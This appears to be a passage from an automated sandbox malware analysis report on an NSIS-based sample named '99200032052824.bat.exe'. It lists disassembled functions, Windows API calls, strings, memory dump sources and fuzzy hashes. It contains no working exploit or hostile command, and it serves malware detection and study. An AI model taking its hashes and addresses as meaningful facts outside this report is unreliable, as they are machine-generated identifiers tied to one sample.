Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
Opcode Fuzzy Hash: a019c31d011b64939239049366c04cc5b7ee72d416c1f9e8157d47185f55a0d4
Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8

Function 00404888 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Inquiring Setup: Installing,Inquiring Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
wsprintfA.USER32 ref: 0040492E
SetDlgItemTextA.USER32(?,Inquiring Setup: Installing), ref: 00404941

Strings

Inquiring Setup: Installing, xrefs: 00404918, 0040491D, 00404923, 00404937
%u.%u%s%s, xrefs: 00404910

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Inquiring Setup: Installing
API String ID: 3540041739-974742300
Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9

Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040B818), ref: 00401E20

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
Opcode Fuzzy Hash: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28

Function 00403739 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75A83410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
GlobalFree.KERNEL32(007B7D30), ref: 0040375A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403739
0}{, xrefs: 0040373A, 00403765

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: 0}{$C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-2116383922
Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC

Function 00405938 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405938

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-787714339
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,?), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC

Function 00405A26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-787714339
Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE

Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040506A
CallWindowProcA.USER32(?,?,?,?), ref: 004050BB

Part of subcall function 0040408B: SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040409D

Strings

, xrefs: 0040504B

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA

Function 00405E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004060CB,80000002), ref: 00405ECD
RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405ED8

Strings

Call, xrefs: 00405E8A, 00405EBE

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405985
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405993

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3443045126
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD

Function 73A310E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73A3115B
GlobalFree.KERNEL32(00000000), ref: 73A311B4
GlobalFree.KERNEL32(?), ref: 73A311C7
GlobalFree.KERNEL32(?), ref: 73A311F5

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8c0729c6443fbc28da63bf50936a132f0167bb62015606205653a03d8c92b348
Instruction ID: f65a7d46591abbd0f0064bc16403567b9fa7dedec8483f12cacafeda629228ed
Opcode Fuzzy Hash: 8c0729c6443fbc28da63bf50936a132f0167bb62015606205653a03d8c92b348
Instruction Fuzzy Hash: 5B3174B25082549FE701BF65DE47BA57FF8EB0B350BA8452FF84AC6298D7399502CB10

Function 73A32015 Relevance: 5.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 73A31CE7
GlobalFree.KERNEL32(?), ref: 73A31CEC
GlobalFree.KERNEL32(?), ref: 73A31CF1
lstrcpyA.KERNEL32(?,?), ref: 73A32061

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: FreeGlobal$lstrcpy
String ID:
API String ID: 176019282-0
Opcode ID: dcf54870f30ed684de1053074b5cc1713302c1457240a4451f36bb634416ba27
Instruction ID: bea7c8a1aa76dab8730e12c5570bb9352b232b11e2056a844828a75874711ff8
Opcode Fuzzy Hash: dcf54870f30ed684de1053074b5cc1713302c1457240a4451f36bb634416ba27
Instruction Fuzzy Hash: 7B31BE7190424E8FCB22DFA4C9827D9BBFAFB4B310F94451BD196A2198C7349985CF50

Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
